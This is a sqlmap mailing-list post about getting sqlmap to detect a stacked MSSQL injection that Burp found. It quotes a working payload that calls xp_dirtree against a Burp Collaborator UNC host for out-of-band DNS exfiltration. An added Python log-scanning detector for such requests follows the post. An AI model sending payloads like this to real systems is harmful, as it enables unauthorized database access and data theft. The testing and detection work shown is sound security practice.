I have a situation where Burp has detected the following DNS exfiltration
injection for a query parameter in a web app:

    GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1

To make that a little easier to read, the injected value is:

    ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--

I've modified the domain and verified that I receive the DNS requests on my
local DNS server (the domain which I provide to sqlmap using the
--dns-domain=xxx option) when the injection is manually sent to the page. The
problem is, when I pass the request to sqlmap it's not detecting that there's
an injection at all. I've provided the OS/DBMS and --level 5, but still no
dice. I'm using sqlmap v1.0.12#stable.
Since I've gotten many other injections to work in the past, I believe that I'm
using sqlmap properly (formatting my request in a file appropriately,
specifying the correct parameter to test, etc.). However, it surprised me that
what appeared to be a fairly straightforward stacked SQL injection would slip
by all of sqlmap's tests. Is there a way to force sqlmap to try DNS
exfiltration injections despite no other injection technique succeeding?
Thanks
V
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
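
Seen from the defending side, a request like the one in the post can be flagged in web server logs. The following is an added example, not part of the original post and not sqlmap or Burp code: it URL-decodes each query parameter, folds '+'-concatenated string literals so a split host name is matched whole, and reports the procedure and UNC host. The sample request lines and host name are constructed, and xp_fileexist and xp_subdirs are included as an assumption beyond the xp_dirtree shown in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Extended procedures that accept a path and will resolve a UNC host name.
# xp_dirtree is the one in the post; the other two are an assumption added here.
PROC_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.I)
# A string literal that starts a UNC path: '\\host\share
UNC_RE = re.compile(r"'\\\\([A-Za-z0-9.-]+)\\")
# Adjacent T-SQL string literals joined with +, e.g. 'abc'+'def'
CONCAT_RE = re.compile(r"'\s*\+\s*'")

# Constructed sample request lines (host name is a placeholder, not from the post).
SAMPLE_REQUESTS = [
    r"GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)"
    r"%3bset%20@q%3d'\\abc123.oob.exa'%2b'mple.test\rtf'%3b%20exec%20"
    r"master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1",
    "GET /XXXX/Store/Page.aspx?ProductCategory=45 HTTP/1.1",
    "GET /XXXX/Store/Search.aspx?q=xp_dirtree HTTP/1.1",
]


def inspect_request(request_line):
    """Return [(param, procedure, unc_host)] for one HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    findings = []
    query = urlsplit(parts[1]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Fold 'a'+'b' into 'ab' so a host split across literals is seen whole.
        folded = CONCAT_RE.sub("", value)
        proc = PROC_RE.search(folded)
        host = UNC_RE.search(folded)
        # Require both: the procedure name alone is too noisy to alert on.
        if proc and host:
            findings.append((name, proc.group(1).lower(), host.group(1).lower()))
    return findings


def scan(request_lines):
    """Map each flagged request line to its findings."""
    return {line: hits for line in request_lines if (hits := inspect_request(line))}


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(hits, "<-", line[:60] + "...")
```

The extracted host name can be matched against DNS resolver logs from the database server to confirm whether the lookup actually left the network.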